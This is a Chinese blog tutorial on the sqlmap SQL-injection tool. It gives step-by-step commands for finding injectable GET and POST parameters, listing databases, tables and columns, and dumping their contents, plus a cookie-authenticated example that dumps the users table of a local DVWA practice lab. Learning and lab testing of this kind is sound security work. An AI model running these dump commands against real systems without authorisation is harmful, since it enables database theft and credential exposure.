sqlmap入门使用

已于 2022-02-06 10:44:52 修改
阅读量1.6k 收藏
点赞数
分类专栏: 网络空间安全 文章标签: python web安全
于 2022-01-20 15:41:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_38720471/article/details/122602853
版权

1get型注入

1.1检查注入点

python sqlmap.py -u "xxxx网站"

1.2查看数据库

python sqlmap.py -u "xxxx网站" --dbs

1.3查看数据库中的表

python sqlmap.py -u "xxxx网站" -D 数据库名 --tables

1.4查看数据库中的表的列

python sqlmap.py -u "xxxx网站" -D 数据库名 -T 表名 --columns

1.5查看数据库中的表中所有内容

python sqlmap.py -u "xxxx网站" -D 数据库名 -T 表名 --columns --dump

2post型注入

2.1首先需要拦截包,然后以txt的形式保存到sqlmap路径下
2.2查看数据库中的表中所有内容

python sqlmap.py -r 文件名字.txt -D 数据库名 -T 表名 --columns --dump

tips:
1:post和get型注入在sqlmap中的使用只在于 get中是 -u “url” 而post是 -r 文件名.txt
2:-p 传输的参数名 可以指定本次注入参数

补充

带有登录凭证的页面是需要登录凭证的,所以使用sqlmap时也要带上登录凭证。

网页F12查看,点击存储
在这里插入图片描述

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"   --cookie="PHPSESSID=84nrp5ikbuiv4dte1hi2ggjbd6;security=low" -D dvwa -T users --columns --dump
逆流!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap扫描信息保存到txt文档
weixin_35752122的博客
01-04 792
如果你想使用 sqlmap 将扫描信息保存到文本文档,你可以使用下面的命令: sqlmap --log-file scan-results.txt -u http://example.com/query?id=1 这会将 sqlmap 的扫描日志保存到名为 "scan-results.txt" 的文本文档中。你可以替换 "http://example.com/query?id=1" 为你想要扫描...
kali sqlmap 默认扫描数据的保存路径
m0_61867082的博客
06-04 1220
/root/.local/share/sqlmap/output/
网络安全最全SQLmap使用教程图文教程(超详细),2024年最新太厉害了
2401_84264610的博客
05-14 1348
1、检测「注入点」2、查看所有「数据库」3、查看当前使用的数据库4、查看「数据表」5、查看「字段」6、查看「数据」
SQL注入工具介绍——sqlmap
p36273的博客
08-01 1827
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。4、联合查询注入,可以使用union的情况下的注入。5、堆叠查询注入,可以同时执行多条语句的执行时的注入。
sqlmap工具说明
tlucky的博客
03-06 1660
版本:v1.4.10支持环境:windows,linux等支持语言:python设计目的:可自动执行SQL注入缺陷的检测和开发过程,并接管数据库服务器实现:有强大的检测引擎,针对不同类型的数据库提供多样的渗透测试功能选项,实现数据库识别、数 据获取、访问DBMS\操作系统甚至通过带外数据连接的方式执行操作系统的命令。,以及从数据 库指纹识别、从数据库获取数据、访问底层文件的广泛范围的交换机通过带外连接在操作系统上 执行命令。
sqlmap工具的使用 (超详细附工具版)
读书 买花 长大
06-11 3127
sqlmap
sqlmap命令大全(附详细扫描流程)
m0_50818626的博客
05-24 7313
3.扫描指定数据库中的所有表名,-D可以指定要扫描的数据库,这里我扫的是security库。红框内就是我们所扫描出的字段名,一共有三个,分别为id,password,username。如上图所示,我们就把我们需要的username和password找出来啦!4.扫描users中的字段名是什么,-T可以指定扫描的表。上图红框内就是security库中的所有表啦。可以看到有漏洞,布尔盲注和时间盲注。可以看到所有的数据库都被扫描出来了。5.用dump扫描出字段中的所有数据。2.扫描所有数据库 -dbs。
sqlmap中文手册.pdf
08-13
sqlmap中文版的使用,仅供学习研究使用.用户手册 介绍——介绍 sqlmap 技术——sqlmap 支持的 SQL 注入技术 特性——支持的特性列表 下载更新——更新你的 sqlmap 副本 相关依赖——关于第三方库和工具的信息 历史...
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap入门使用,两种方法一道题
最新发布
07-16
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap入门使用,两种方法一道题。题目地址:https://ctf.bugku.com/challenges/detail/id/84.html?id=84&page=8 这道题可以有效的锻炼union注入和sqlmap入门操作,...
SqlMap入门指南-思维导图.png
04-25
SqlMap入门指南.png
ibatis-sqlMap-入门教程(代码)
10-22
【标题】"ibatis-sqlMap-入门教程(代码)" 涉及的知识点主要集中在使用MyBatis(原iBATIS)框架进行数据库操作的初步实践上。MyBatis是一个优秀的持久层框架,它支持定制化SQL、存储过程以及高级映射,避免了几乎...
sqlmap手册-中文版.pdf
07-30
sqlmap
sqlmap学习笔记:常用命令
ElsonHY的博客
12-08 1037
文章目录前言0x01 使用环境0x02 判断注入点0x03 常用命令1.查询当前数据库2.查询所有数据库3.爆表名4.爆字段名5.脱库6.获取数据库用户密码(加爆破)0x04 总结 前言 sqlmap可以说是sql自动化注入工具的不二之选了,通常sql注入的过程中,也没有人绝对地只用手注或者自动化注入,通常是根据实际情况两者配合使用,这篇文章以POST类型注入为例子,示范sqlmap常用命令的使用方法。 0x01 使用环境 测试网页:sqli-labs的第11关。 操作系统:kali(由于win环境
sqlmap默认输出路径的设置
热门推荐
YQ的博客
04-10 1万+
SQLMap的默认输出路径是在 C:/Users/用户名/.sqlmap/output/下的。 但是刚安装完sqlmap后C:/Users/用户名/ 文件下是不存在.sqlmap这个文件夹的,需要使用sqlmap扫描一下网站,程序才会建立该文件夹。 设置sqlmap的默认输出路径很简单,执行如下命令: 在--output-dir后面输入想要导出的文件路径。 这样程序执行之后就
使用sqlmap + burpsuite sql工具注入拿flag
太阳照耀我走四方
02-13 1695
简单的渗透工具sqlmap使用
我的SQLmap使用方法(详解)
weixin_41182861的博客
05-12 4276
SQLMAP是一个由Python语言编写的开源渗透测试工具,它主要用来检测sql注入漏洞(sql盲注、union查询、显错注入、延迟注入、post注入、cookie注入等),是一款功能强大的sql漏洞检测利用工具。sqlmap可以检测的数据库有:access、mssql、mysql、oracle、postgresql、db2、sqlite等。其他功能:执行命令、列举用户、检测权限、自动破解、数据导出等功能。...
Sqlmap详解使用
白白白
09-03 5914
转载自https://www.anquanke.com/post/id/235846 作者:谢公子 感谢作者,内容非常详细。 Sqlmap sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等 Sqlmap采用了以下5种独特的SQL注入技术 基于布尔类型的盲注,即可
sqlmap命令详解
Pitbull2014的博客
12-20 1125
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
sqlmap使用教程
09-13
关于sqlmap使用教程,以下是一些基本的指导步骤: ...这只是一个简单的入门指南,sqlmap还有很多其他高级功能和选项。请记住,在进行任何安全测试之前,确保你已经获得相关授权,并且在合法和道德的框架内进行测试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值